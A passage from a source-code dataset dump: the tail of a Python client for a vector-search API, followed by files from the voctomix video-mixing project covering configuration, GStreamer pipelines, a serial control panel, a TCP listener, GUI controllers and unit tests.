"negative_document_ids": negative_document_ids,
"search_fields": fields,
"vector_operation": vector_operation,
"sum_fields": sum_fields,
"facets": facets,
"filters": filters,
"metric": metric,
"min_score": min_score,
"page": page,
"page_size": page_size,
"include_vector": include_vector,
"include_count": include_count,
"include_facets": include_facets,
},
).json()
```
#### File: models/deployed/image.py
```python
import io
import base64
import requests
from .base import ViDeployedModel
class ViImage2Vec(ViDeployedModel):
def encode(self, image):
return requests.get(
url="{}/collection/encode_image".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": self.collection_name,
"image_url": image,
},
).json()
@property
def __name__(self):
if self._name is None:
return "deployed_image"
return self._name
@__name__.setter
def __name__(self, value):
self._name = value
class ViImageArray2Vec(ViDeployedModel):
def __init__(
self,
username,
api_key,
url=None,
collection_name="base",
vector_operation: str = "mean",
):
self.username = username
self.api_key = api_key
if url:
self.url = url
else:
self.url = "https://api.vctr.ai"
self.collection_name = collection_name
def encode(self, images):
return _vector_operation(
[
requests.get(
url="{}/collection/encode_image".format(self.url),
params={
"username": self.username,
"api_key": self.api_key,
"collection_name": self.collection_name,
"image_url": image,
},
).json()
for image in images
],
vector_operation=self.vector_operation,
)
@property
def __name__(self):
if self._name is None:
return "deployed_image_array"
return self._name
@__name__.setter
def __name__(self, value):
self._name = value
``` |
{
"source": "0xflotus/voctomix",
"score": 3
} |
#### File: voctolight/lib/config.py
```python
import logging
import os.path
from configparser import ConfigParser
__all__ = ['Config']
def getlist(self, section, option):
return [x.strip() for x in self.get(section, option).split(',')]
def fetchServerConfig(self, conn):
log = logging.getLogger('Config')
log.info("reading server-config")
server_config = conn.fetchServerConfig()
log.info("merging server-config %s", server_config)
self.read_dict(server_config)
ConfigParser.getlist = getlist
ConfigParser.fetchServerConfig = fetchServerConfig
files = [
os.path.join(os.path.dirname(os.path.realpath(__file__)),
'../default-config.ini'),
os.path.join(os.path.dirname(os.path.realpath(__file__)),
'../config.ini'),
'/etc/voctomix/voctolight.ini',
'/etc/voctolight.ini',
os.path.expanduser('~/.voctolight.ini'),
]
Config = ConfigParser()
Config.read(files)
```
#### File: example-scripts/voctopanel/voctopanel.py
```python
import atexit
import socket
import sys
import time
import serial
from lib.config import Config
server_address = Config.get("server", "address")
server_port = Config.get("server", "port")
panel_port = Config.get("panel", "port")
panel_speed = Config.get("panel", "speed")
panel_size = Config.get("panel", "size")
conn, ser = None, None
try:
conn = socket.create_connection((server_address, server_port))
except (ConnectionRefusedError, KeyboardInterrupt):
print("Could not connect to voctocore")
sys.exit()
@atexit.register
def close_conn():
global conn
conn and conn.close()
try:
ser = serial.Serial(panel_port, panel_speed, timeout=1)
except (ValueError, serial.SerialException):
print("Could not connect to voctopanel")
sys.exit()
@atexit.register
def close_pannel():
global ser
ser.close()
print("Entering main loop. Press Control-C to exit.")
try:
# just wait for keyboard interrupt in main thread
while True:
if True: #ser.in_waiting > 0:
try:
btn = ser.readline().decode("utf-8").strip()
except serial.serialutil.SerialException:
print("probably missed one button press")
#check if this is a button press and if it is remove the leading v
if str(btn)[:1] == 'v':
btn = btn[1:]
try:
cm = Config.get("buttons",btn)
except:
print("broken or not defined button received")
print(cm) #debug
print("Sending: '{}'".format(cm))
try:
conn.sendall(cm.encode('ascii') + b"\n")
except BrokenPipeError:
print("voctocore disconnected, trying to reconnect")
try:
conn = socket.create_connection((server_address, server_port))
print("Reconnected to voctocore")
except:
pass
led = btn + 'o'
ser.write(led.encode())
else:
pass
#print(btn[:1])
else:
print('no input')
#time.sleep(1)
except KeyboardInterrupt:
print("")
```
#### File: lib/sources/avsource.py
```python
import logging
from abc import ABCMeta, abstractmethod
from gi.repository import GLib
from lib.config import Config
from lib.args import Args
class AVSource(object, metaclass=ABCMeta):
def __init__(self,
class_name,
name,
has_audio=True,
has_video=True,
num_streams=None,
show_no_signal=False):
# create logging interface
self.log = logging.getLogger("%s[%s]" % (class_name, name))
# make sure we have at least something
assert has_audio or has_video
# remember things
self.class_name = class_name
self.name = name
self.has_audio = has_audio
self.has_video = has_video
# fetch audio streams from config (different for blinder source)
if name == "blinder":
self.audio_streams = Config.getBlinderAudioStreams()
else:
self.audio_streams = Config.getAudioStreams()
# remember if we shall show no-signal underlay
self.show_no_signal = show_no_signal and Config.getNoSignal()
# maybe initialize no signal watch dog
if self.show_no_signal:
# check if we have video to show no-signal message
assert self.has_video
# set timeout at which we check for signal loss
GLib.timeout_add(self.timer_resolution * 1000, self.do_timeout)
# this might get attached to the no-signal compositor's input sink
self.noSignalSink = None
@abstractmethod
def __str__(self):
raise NotImplementedError(
'__str__ not implemented for this source')
def attach(self, pipeline):
if self.show_no_signal:
# attach self.noSignalSink to no-signal compositor
self.noSignalSink = pipeline.get_by_name(
'compositor-{}'.format(self.name)).get_static_pad('sink_1')
def build_pipeline(self):
self.bin = "" if Args.no_bins else """
bin.(
name={class_name}-{name}
""".format(class_name=self.class_name, name=self.name)
self.bin += self.build_source()
if self.internal_audio_channels():
audioport = self.build_audioport()
if audioport:
audio_streams = self.audio_streams.get_stream_names(self.name)
self.bin += """
{audioport}
! queue
max-size-time=3000000000
name=queue-source-audio-{name}
! tee
name=source-audio-{name}
""".format(
audioport=audioport,
name=self.name
)
if not audio_streams:
self.bin += """
source-audio-{name}.
! queue
max-size-time=3000000000
name=queue-source-audio-fakesink-{name}
! fakesink
async=false
""".format(name=self.name)
for stream in audio_streams:
self.log.info("Creating audio streams '{}' from source '{}'".format(stream,self.name))
self.bin += """
source-audio-{name}.
! queue
max-size-time=3000000000
name=queue-audiomixmatrix-{stream}
! audiomixmatrix
name=audiomixmatrix-{stream}
in-channels={in_channels}
out-channels={out_channels}
matrix="{matrix}"
! {acaps}
! queue
name=queue-audio-{stream}
max-size-time=3000000000
! tee
name=audio-{stream}
""".format(
in_channels=self.internal_audio_channels(),
out_channels=Config.getAudioChannels(),
matrix=str(self.audio_streams.matrix(self.name,
stream,
Config.getAudioChannels(),
grid=self.get_valid_channel_numbers())
).replace("[", "<").replace("]", ">"),
acaps=Config.getAudioCaps(),
stream=stream,
name=self.name
)
if self.has_video:
if self.show_no_signal and Config.getNoSignal():
video = """
videotestsrc
name=canvas-{name}
pattern={nosignalpattern}
! textoverlay
name=nosignal-{name}
text=\"{nosignal}\"
valignment=center
halignment=center
shaded-background=yes
font-desc="Roboto Bold, 20"
! {vcaps}
! queue
max-size-time=3000000000
! compositor-{name}.
{videoport}
! {vcaps}
! queue
max-size-time=3000000000
! compositor-{name}.
compositor
name=compositor-{name}
! queue
max-size-time=3000000000
! tee
name=video-{name}"""
else:
video = """
{videoport}
! {vcaps}
! queue
max-size-time=3000000000
! tee
name=video-{name}"""
self.bin += video.format(
videoport=self.build_videoport(),
name=self.name,
vcaps=Config.getVideoCaps(),
nosignal=self.get_nosignal_text(),
nosignalpattern=Config.getNoSignal()
)
self.bin += "" if Args.no_bins else """
)
"""
self.bin = self.bin
def build_source(self):
return ""
def build_deinterlacer(self):
source_mode = Config.getSourceScan(self.name)
if source_mode == "interlaced":
return "videoconvert ! yadif mode=interlaced"
elif source_mode == "psf":
return "capssetter " \
"caps=video/x-raw,interlace-mode=progressive"
elif source_mode == "progressive":
return None
else:
raise RuntimeError(
"Unknown Deinterlace-Mode on source {} configured: {}".
format(self.name, source_mode))
def video_channels(self):
return 1 if self.has_video else 0
def audio_channels(self):
return self.audio_streams.num_channels(self.name) if self.has_audio else 0
def internal_audio_channels(self):
return self.audio_streams.num_channels(self.name, self.get_valid_channel_numbers()) if self.has_audio else 0
def get_valid_channel_numbers(self):
return [x for x in range(1, 255)]
def num_connections(self):
return 0
def is_input(self):
return True
def section(self):
return 'source.{}'.format(self.name)
@abstractmethod
def port(self):
raise NotImplementedError("port() not implemented in %s" % self.name)
def build_audioport(self):
raise None
def build_videoport(self):
raise None
def get_nosignal_text(self):
return "NO SIGNAL\n" + self.name.upper()
def do_timeout(self):
if self.noSignalSink:
self.noSignalSink.set_property(
'alpha', 1.0 if self.num_connections() > 0 else 0.0)
# just come back
return True
```
#### File: lib/sources/decklinkavsource.py
```python
import logging
import re
from lib.config import Config
from lib.sources.avsource import AVSource
class DeckLinkAVSource(AVSource):
timer_resolution = 0.5
def __init__(self, name, has_audio=True, has_video=True):
super().__init__('DecklinkAVSource', name, has_audio, has_video, show_no_signal=True)
self.device = Config.getDeckLinkDeviceNumber(name)
self.aconn = Config.getDeckLinkAudioConnection(name)
self.vconn = Config.getDeckLinkVideoConnection(name)
self.vmode = Config.getDeckLinkVideoMode(name)
self.vfmt = Config.getDeckLinkVideoFormat(name)
self.name = name
self.signalPad = None
self.build_pipeline()
def port(self):
return "Decklink #{}".format(self.device)
def attach(self, pipeline):
super().attach(pipeline)
self.signalPad = pipeline.get_by_name(
'decklinkvideosrc-{}'.format(self.name))
def num_connections(self):
return 1 if self.signalPad and self.signalPad.get_property('signal') else 0
def get_valid_channel_numbers(self):
return (2, 8, 16)
def __str__(self):
return 'DecklinkAVSource[{name}] reading card #{device}'.format(
name=self.name,
device=self.device
)
def build_source(self):
# A video source is required even when we only need audio
pipe = """
decklinkvideosrc
name=decklinkvideosrc-{name}
device-number={device}
connection={conn}
video-format={fmt}
mode={mode}
""".format(name=self.name,
device=self.device,
conn=self.vconn,
mode=self.vmode,
fmt=self.vfmt
)
# add rest of the video pipeline
if self.has_video:
# maybe add deinterlacer
if self.build_deinterlacer():
pipe += """\
! {deinterlacer}
""".format(deinterlacer=self.build_deinterlacer())
pipe += """\
! videoconvert
! videoscale
! videorate
name=vout-{name}
""".format(
deinterlacer=self.build_deinterlacer(),
name=self.name
)
else:
pipe += """\
! fakesink
"""
if self.internal_audio_channels():
pipe += """
decklinkaudiosrc
name=decklinkaudiosrc-{name}
device-number={device}
connection={conn}
channels={channels}
""".format(name=self.name,
device=self.device,
conn=self.aconn,
channels=self.internal_audio_channels())
return pipe
def build_audioport(self):
return 'decklinkaudiosrc-{name}.'.format(name=self.name)
def build_videoport(self):
return 'vout-{}.'.format(self.name)
def get_nosignal_text(self):
return super().get_nosignal_text() + "/BM%d" % self.device
```
#### File: voctocore/lib/tcpmulticonnection.py
```python
import logging
import socket
import sys
from queue import Queue
from abc import ABCMeta, abstractmethod
from gi.repository import GObject
class TCPMultiConnection(object, metaclass=ABCMeta):
def __init__(self, port):
if not hasattr(self, 'log'):
self.log = logging.getLogger('TCPMultiConnection')
self._port = None
try:
self.boundSocket = None
self.currentConnections = dict()
self.log.debug('Binding to Source-Socket on [::]:%u', port)
self.boundSocket = socket.socket(socket.AF_INET6)
self.boundSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.boundSocket.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY,
False)
self.boundSocket.bind(('::', port))
self.boundSocket.listen(1)
self._port = port
self.log.debug('Setting GObject io-watch on Socket')
GObject.io_add_watch(self.boundSocket, GObject.IO_IN, self.on_connect)
except OSError:
self.log.error("Can not open listening port %d because it is already in use. Is another instance of voctocore running already?" % port)
sys.exit(-1)
def port(self):
return "%s:%d" % (socket.gethostname(), self._port if self._port else 0)
def num_connections(self):
return len(self.currentConnections)
def is_input(self):
return False
def on_connect(self, sock, *args):
conn, addr = sock.accept()
conn.setblocking(False)
self.log.info("Incoming Connection from [%s]:%u (fd=%u)",
addr[0], addr[1], conn.fileno())
self.currentConnections[conn] = Queue()
self.log.info('Now %u Receiver(s) connected',
len(self.currentConnections))
self.on_accepted(conn, addr)
return True
def close_connection(self, conn):
if conn in self.currentConnections:
conn.close()
del(self.currentConnections[conn])
self.log.info('Now %u Receiver connected',
len(self.currentConnections))
@abstractmethod
def on_accepted(self, conn, addr):
raise NotImplementedError(
"child classes of TCPMultiConnection must implement on_accepted()"
)
```
#### File: tests/commands/test_get_audio.py
```python
import json
from mock import ANY
from lib.response import OkResponse
from tests.commands.commands_test_base import CommandsTestBase
class GetAudioTest(CommandsTestBase):
def test_get_audio(self):
self.pipeline_mock.amix.getAudioVolumes.return_value = [1.0, 0.0, 0.25]
response = self.commands.get_audio()
self.assertIsInstance(response, OkResponse)
self.assertEqual(response.args, ('audio_status', ANY))
self.assertEqual(json.loads(response.args[1]), {
"cam1": 1.0,
"cam2": 0.0,
"grabber": 0.25
})
```
#### File: tests/commands/test_get_config_option.py
```python
import configparser
from lib.config import Config
from lib.response import OkResponse
from tests.commands.commands_test_base import CommandsTestBase
class GetConfigOptionTest(CommandsTestBase):
def test_get_config_option(self):
Config.given('somesection', 'somekey', 'somevalue')
response = self.commands.get_config_option('somesection', 'somekey')
self.assertIsInstance(response, OkResponse)
self.assertEqual(response.args, ('server_config_option', 'somesection', 'somekey', 'somevalue'))
def test_get_option_from_unknown_config_section_fails(self):
with self.assertRaises(configparser.NoSectionError):
self.commands.get_config_option('othersection', 'otherkey')
def test_get_unknown_config_option_fails(self):
Config.given('somesection', 'somekey', 'somevalue')
with self.assertRaises(configparser.NoOptionError):
self.commands.get_config_option('somesection', 'otherkey')
```
#### File: tests/commands/test_set_audio.py
```python
from mock import ANY
from lib.response import NotifyResponse
from tests.commands.commands_test_base import CommandsTestBase
class SetAudioTest(CommandsTestBase):
def test_set_audio(self):
response = self.commands.set_audio("grabber")
self.pipeline_mock.amix.setAudioSource.assert_called_with(2)
self.assertIsInstance(response, NotifyResponse)
self.assertEqual(response.args, ('audio_status', ANY))
def test_cant_set_audio_to_unknown_value(self):
with self.assertRaises(ValueError):
self.commands.set_audio("moofoo")
self.pipeline_mock.amix.setAudioSource.assert_not_called()
def test_cant_set_audio_to_int(self):
with self.assertRaises(ValueError):
self.commands.set_audio(1)
self.pipeline_mock.amix.setAudioSource.assert_not_called()
```
#### File: tests/commands/test_set_video.py
```python
from mock import ANY
from lib.response import NotifyResponse
from tests.commands.commands_test_base import CommandsTestBase
class SetVideoTest(CommandsTestBase):
def test_set_video_a(self):
response = self.commands.set_video_a("cam2")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(1)
self.assertIsInstance(response, NotifyResponse)
self.assertEqual(response.args, ('video_status', ANY, ANY))
def test_cant_set_video_a_to_unknown_value(self):
with self.assertRaises(ValueError):
self.commands.set_video_a("foobar")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
def test_cant_set_video_a_to_int(self):
with self.assertRaises(ValueError):
self.commands.set_video_a(1)
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
def test_set_video_b(self):
response = self.commands.set_video_b("grabber")
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(2)
self.assertIsInstance(response, NotifyResponse)
self.assertEqual(response.args, ('video_status', ANY, ANY))
def test_cant_set_video_b_to_unknown_value(self):
with self.assertRaises(ValueError):
self.commands.set_video_b("moobar")
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
def test_cant_set_video_b_to_int(self):
with self.assertRaises(ValueError):
self.commands.set_video_b(2)
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
```
#### File: tests/commands/test_set_videos_and_composite.py
```python
from mock import ANY
from tests.commands.commands_test_base import CommandsTestBase
from lib.videomix import CompositeModes
class CommandsSetVideosAndComposite(CommandsTestBase):
def test_returns_expected_notifications(self):
self.pipeline_mock.vmix.getCompositeMode.return_value = \
CompositeModes.fullscreen
self.pipeline_mock.vmix.getVideoSourceA.return_value = 0
self.pipeline_mock.vmix.getVideoSourceB.return_value = 1
notifications = self.commands.set_videos_and_composite(
"cam1", "*", "*")
self.assertContainsNotification(
notifications, 'composite_mode', 'fullscreen')
self.assertContainsNotification(
notifications, 'video_status', 'cam1', 'cam2')
def test_can_set_video_a(self):
self.commands.set_videos_and_composite("cam1", "*", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(0)
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
self.pipeline_mock.vmix.setCompositeMode.assert_not_called()
def test_cant_set_video_a_to_invalid_value(self):
with self.assertRaises(ValueError):
self.commands.set_videos_and_composite("foobar", "*", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
def test_can_set_video_b(self):
self.commands.set_videos_and_composite("*", "cam2", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(1)
self.pipeline_mock.vmix.setCompositeMode.assert_not_called()
def test_cant_set_video_b_to_invalid_value(self):
with self.assertRaises(ValueError):
self.commands.set_videos_and_composite("*", "foobar", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
def test_can_set_video_a_and_b(self):
self.commands.set_videos_and_composite("cam2", "grabber", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(1)
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(2)
self.pipeline_mock.vmix.setCompositeMode.assert_not_called()
def test_cant_set_video_a_and_b_to_invalid_value(self):
with self.assertRaises(ValueError):
self.commands.set_videos_and_composite("foobar", "foobar", "*")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
def test_can_set_video_a_and_composite_mode(self):
self.commands.set_videos_and_composite("cam2", "*", "fullscreen")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(1)
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.fullscreen, apply_default_source=ANY)
def test_can_set_video_b_and_composite_mode(self):
self.commands.set_videos_and_composite(
"*", "grabber", "side_by_side_equal")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(2)
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.side_by_side_equal, apply_default_source=ANY)
def test_can_set_video_a_and_b_and_composite_mode(self):
self.commands.set_videos_and_composite(
"cam1", "grabber", "side_by_side_equal")
self.pipeline_mock.vmix.setVideoSourceA.assert_called_with(0)
self.pipeline_mock.vmix.setVideoSourceB.assert_called_with(2)
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.side_by_side_equal, apply_default_source=ANY)
def test_can_set_composite_mode(self):
self.commands.set_videos_and_composite(
"*", "*", "side_by_side_preview")
self.pipeline_mock.vmix.setVideoSourceA.assert_not_called()
self.pipeline_mock.vmix.setVideoSourceB.assert_not_called()
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.side_by_side_preview, apply_default_source=ANY)
def test_setting_composite_mode_without_sources_applies_default_source(self):
self.commands.set_videos_and_composite(
"*", "*", "side_by_side_preview")
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.side_by_side_preview, apply_default_source=True)
def test_setting_composite_mode_with_a_source_does_not_apply_default_source(self):
self.commands.set_videos_and_composite("grabber", "*", "fullscreen")
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.fullscreen, apply_default_source=False)
def test_setting_composite_mode_with_b_source_does_not_apply_default_source(self):
self.commands.set_videos_and_composite("*", "grabber", "fullscreen")
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.fullscreen, apply_default_source=False)
def test_setting_composite_mode_with_a_and_b_source_does_not_apply_default_source(self):
self.commands.set_videos_and_composite("cam1", "grabber", "fullscreen")
self.pipeline_mock.vmix.setCompositeMode.assert_called_with(
CompositeModes.fullscreen, apply_default_source=False)
```
#### File: tests/videomix/test_videomixer_set_sources.py
```python
from tests.helper.voctomix_test import VoctomixTest
from lib.videomix import VideoMix
class VideomixerSetSources(VoctomixTest):
def setUp(self):
super().setUp()
self.videomixer = VideoMix()
def test_can_set_source_a(self):
self.videomixer.setVideoSourceA(42)
self.assertEqual(self.videomixer.sourceA, 42)
def test_can_set_source_b(self):
self.videomixer.setVideoSourceB(23)
self.assertEqual(self.videomixer.sourceB, 23)
def test_setting_source_a_swaps_a_and_b_if_required(self):
self.videomixer.sourceA = 42
self.videomixer.sourceB = 23
self.videomixer.setVideoSourceA(23)
self.assertEqual(self.videomixer.sourceA, 23)
self.assertEqual(self.videomixer.sourceB, 42)
def test_setting_source_b_swaps_a_and_b_if_required(self):
self.videomixer.sourceA = 13
self.videomixer.sourceB = 78
self.videomixer.setVideoSourceB(13)
self.assertEqual(self.videomixer.sourceA, 78)
self.assertEqual(self.videomixer.sourceB, 13)
```
#### File: voctogui/lib/args.py
```python
import argparse
__all__ = ['Args']
Args = None
def parse():
global Args
parser = argparse.ArgumentParser(description='Voctogui')
parser.add_argument('-v', '--verbose', action='count', default=0,
help="Set verbosity level by using -v, -vv or -vvv.")
parser.add_argument('-c', '--color',
action='store',
choices=['auto', 'always', 'never'],
default='auto',
help="Control the use of colors in the Log-Output")
parser.add_argument('-t', '--timestamp', action='store_true',
help="Enable timestamps in the Log-Output")
parser.add_argument('-i', '--ini-file', action='store',
help="Load a custom configuration file")
parser.add_argument('-H', '--host', action='store',
help="Connect to this host "
"instead of the configured one.")
parser.add_argument('-d', '--dot', action='store_true',
help="Generate DOT files of pipelines into directory given in environment variable GST_DEBUG_DUMP_DOT_DIR")
parser.add_argument('-D', '--gst-debug-details', action='store', default=15,
help="Set details in dot graph. GST_DEBUG_DETAILS must be a combination the following values: 1 = show caps-name on edges, 2 = show caps-details on edges, 4 = show modified parameters on elements, 8 = show element states, 16 = show full element parameter values even if they are very long. Default: 15 = show all the typical details that one might want (15=1+2+4+8)")
parser.add_argument('-g', '--gstreamer-log', action='count', default=0,
help="Log gstreamer messages into voctocore log (Set log level by using -g, -gg or -ggg).")
Args = parser.parse_args()
```
#### File: voctogui/lib/ports.py
```python
import logging
import os
import json
from gi.repository import Gtk, Gst, GLib
from lib.config import Config
from lib.uibuilder import UiBuilder
import lib.connection as Connection
from vocto.port import Port
# time interval to re-fetch queue timings
TIMER_RESOLUTION = 5.0
COLOR_OK = ("white", "darkgreen")
COLOR_WARN = ("darkred", "darkorange")
COLOR_ERROR = ("white", "red")
class PortsWindowController():
def __init__(self, uibuilder):
self.log = logging.getLogger('QueuesWindowController')
# get related widgets
self.win = uibuilder.get_check_widget('ports_win')
self.store = uibuilder.get_check_widget('ports_store')
self.scroll = uibuilder.get_check_widget('ports_scroll')
self.title = uibuilder.get_check_widget('ports_title')
self.title.set_title("VOC2CORE {}".format(Config.getHost()))
# remember row iterators
self.iterators = None
# listen for queue_report from voctocore
Connection.on('port_report', self.on_port_report)
def on_port_report(self, *report):
def color(port):
if port.connections > 0:
return COLOR_OK
else:
return COLOR_ERROR if port.is_input() else COLOR_WARN
# read string report into dictonary
report = json.loads("".join(report))
# check if this is the initial report
if not self.iterators:
# append report as rows to treeview store and remember row iterators
self.iterators = dict()
for p in report:
port = Port.from_str(p)
self.iterators[port.port] = self.store.append((
port.name,
port.audio,
port.video,
"IN" if port.is_input() else "OUT",
port.port,
*color(port)
))
else:
# just update values of second column
for p in report:
port = Port.from_str(p)
it = self.iterators[port.port]
self.store.set_value(it, 0, port.name)
self.store.set_value(it, 1, port.audio)
self.store.set_value(it, 2, port.video)
self.store.set_value(it, 3, "IN" if port.is_input() else "OUT")
self.store.set_value(it, 4, port.port)
self.store.set_value(it, 5, color(port)[0])
self.store.set_value(it, 6, color(port)[1])
def show(self, visible=True):
# check if widget is getting visible
if visible:
# request queue timing report from voctocore
Connection.send('report_ports')
# schedule repetition
GLib.timeout_add(TIMER_RESOLUTION * 1000, self.do_timeout)
# do the boring stuff
self.win.show()
else:
self.win.hide()
def do_timeout(self):
# re-request queue report
Connection.send('report_ports')
# repeat if widget is visible
return self.win.is_visible()
```
#### File: voctogui/lib/videodisplay.py
```python
import logging
import sys
from gi.repository import Gst, Gdk
from lib.args import Args
from lib.config import Config
from lib.clock import Clock
from vocto.port import Port
from vocto.debug import gst_generate_dot
from vocto.pretty import pretty
class VideoDisplay(object):
"""Displays a Voctomix-Video-Stream into a GtkWidget"""
def __init__(self, video_drawing_area, audio_display, port, name, width=None, height=None,
play_audio=False):
self.log = logging.getLogger('VideoDisplay:%s' % name)
self.name = name
self.video_drawing_area = video_drawing_area
self.level_callback = audio_display.callback
video_decoder = None
# Setup Server-Connection, Demuxing and Decoding
pipe = """
tcpclientsrc
name=tcpsrc-{name}
host={host}
port={port}
blocksize=1048576
! matroskademux
name=demux-{name}
""".format(name=name,
host=Config.getHost(),
port=port)
if Config.getPreviewsEnabled():
self.log.info('using encoded previews instead of raw-video')
if Config.getPreviewVaapi():
if Gst.version() < (1, 8):
vaapi_decoders = {
'h264': 'vaapidecode_h264',
'mpeg2': 'vaapidecode_mpeg2',
}
else:
vaapi_decoders = {
'h264': 'vaapih264dec',
'mpeg2': 'vaapimpeg2dec',
}
video_decoder = vaapi_decoders[Config.getPreviewDecoder()]
else:
cpu_decoders = {
'h264': 'video/x-h264\n! avdec_h264',
'jpeg': 'image/jpeg\n! jpegdec',
'mpeg2': 'video/mpeg\nmpegversion=2\n! mpeg2dec'
}
video_decoder = cpu_decoders[Config.getPreviewDecoder()]
pipe += """
demux-{name}.
! queue
name=queue-video-{name}
! {video_decoder}
""".format(name=name,
video_decoder=video_decoder)
else:
video_decoder = None
preview_caps = 'video/x-raw'
self.log.info('using raw-video instead of encoded-previews')
pipe += """
demux-{name}.
! queue
name=queue-video-{name}
! {previewcaps}
""".format(name=name,
previewcaps=preview_caps,
vcaps=Config.getVideoCaps())
pipe += """ ! videoconvert
! videoscale
"""
if Config.getPreviewNameOverlay() and name:
pipe += """\
! textoverlay
name=title-{name}
text=\"{name}\"
valignment=bottom
halignment=center
shaded-background=yes
font-desc="Roboto, 22"
""".format(name=name)
# Video Display
videosystem = Config.getVideoSystem()
self.log.debug('Configuring for Video-System %s', videosystem)
if videosystem == 'gl':
pipe += """ ! glupload
! glcolorconvert
! glimagesinkelement
name=imagesink-{name}
""".format(name=name)
elif videosystem == 'xv':
pipe += """ ! xvimagesink
name=imagesink-{name}
""".format(name=name)
elif videosystem == 'x':
pipe += """ ! ximagesink
name=imagesink-{name}
""".format(name=name)
elif videosystem == 'vaapi':
pipe += """ ! vaapisink
name=imagesink-{name}
""".format(name=name)
else:
raise Exception(
'Invalid Videodisplay-System configured: %s' % videosystem
)
# add an Audio-Path through a level-Element
pipe += """
demux-{name}.
! queue
name=queue-audio-{name}
! level
name=lvl
interval=50000000
! audioconvert
"""
# If Playback is requested, push fo pulseaudio
if play_audio:
pipe += """ ! pulsesink
name=audiosink-{name}
"""
else:
pipe += """ ! fakesink
"""
pipe = pipe.format(name=name,
acaps=Config.getAudioCaps(),
port=port,
)
self.log.info("Creating Display-Pipeline:\n%s", pretty(pipe))
try:
# launch gstreamer pipeline
self.pipeline = Gst.parse_launch(pipe)
self.log.info("pipeline launched successfuly")
except:
self.log.error("Can not launch pipeline")
sys.exit(-1)
if Args.dot:
self.log.debug("Generating DOT image of videodisplay pipeline")
gst_generate_dot(self.pipeline, "gui.videodisplay.{}".format(name))
self.pipeline.use_clock(Clock)
self.video_drawing_area.add_events(
Gdk.EventMask.KEY_PRESS_MASK | Gdk.EventMask.KEY_RELEASE_MASK)
self.video_drawing_area.connect("realize", self.on_realize)
bus = self.pipeline.get_bus()
bus.add_signal_watch()
bus.enable_sync_message_emission()
bus.connect('message::error', self.on_error)
bus.connect('sync-message::element', self.on_syncmsg)
bus.connect('message::state-changed', self.on_state_changed)
bus.connect("message::element", self.on_level)
def on_realize(self, win):
self.imagesink = self.pipeline.get_by_name(
'imagesink-{name}'.format(name=self.name))
self.xid = self.video_drawing_area.get_property('window').get_xid()
self.log.debug('Realized Drawing-Area with xid %u', self.xid)
self.video_drawing_area.realize()
self.log.info("Launching Display-Pipeline")
self.pipeline.set_state(Gst.State.PLAYING)
def on_syncmsg(self, bus, msg):
if type(msg) == Gst.Message and self.imagesink:
if msg.get_structure().get_name() == "prepare-window-handle":
self.log.info(
'Setting imagesink window-handle to 0x%x', self.xid)
self.imagesink.set_window_handle(self.xid)
def on_error(self, bus, message):
(error, debug) = message.parse_error()
self.log.error(
"GStreamer pipeline element '%s' signaled an error #%u: %s" % (message.src.name, error.code, error.message))
def mute(self, mute):
self.pipeline.get_by_name("audiosink-{name}".format(name=self.name)).set_property(
"volume", 1 if mute else 0)
def on_level(self, bus, msg):
if self.level_callback and msg.src.name == 'lvl':
rms = msg.get_structure().get_value('rms')
peak = msg.get_structure().get_value('peak')
decay = msg.get_structure().get_value('decay')
self.level_callback(rms, peak, decay)
def on_state_changed(self, bus, message):
if message.parse_state_changed().newstate == Gst.State.PLAYING:
self.video_drawing_area.show()
```
#### File: voctogui/lib/videopreviews.py
```python
import logging
import json
import math
import os
from configparser import NoOptionError
from gi.repository import Gtk, Gdk, GObject
from lib.videodisplay import VideoDisplay
from lib.audiodisplay import AudioDisplay
import lib.connection as Connection
from lib.config import Config
from vocto.port import Port
class VideoPreviewsController(object):
"""Displays Video-Previews and selection Buttons for them"""
def __init__(self, video_box, audio_box, win, uibuilder):
self.log = logging.getLogger('VideoPreviewsController')
self.win = win
self.preview_players = {}
self.previews = {}
self.volume_sliders = {}
self.video_box = video_box
self.audio_box = audio_box
# Accelerators
accelerators = Gtk.AccelGroup()
win.add_accel_group(accelerators)
# count number of previews
num_previews = len(Config.getSources()) + len(Config.getLivePreviews())
# get preview size
self.previewSize = Config.getPreviewSize()
# recalculate preview size if in sum they are too large for screen
screen = Gdk.Screen.get_default()
if screen.get_height() < self.previewSize[1] * num_previews:
height = screen.get_height() / num_previews
self.previewSize = (Config.getVideoRatio() * height, height)
self.log.warning(
'Resizing previews so that they fit onto screen to WxH={}x{}'.format(*self.previewSize))
# connect event-handler and request initial state
Connection.send('get_video')
def addPreview(self, uibuilder, source, port, has_volume=True):
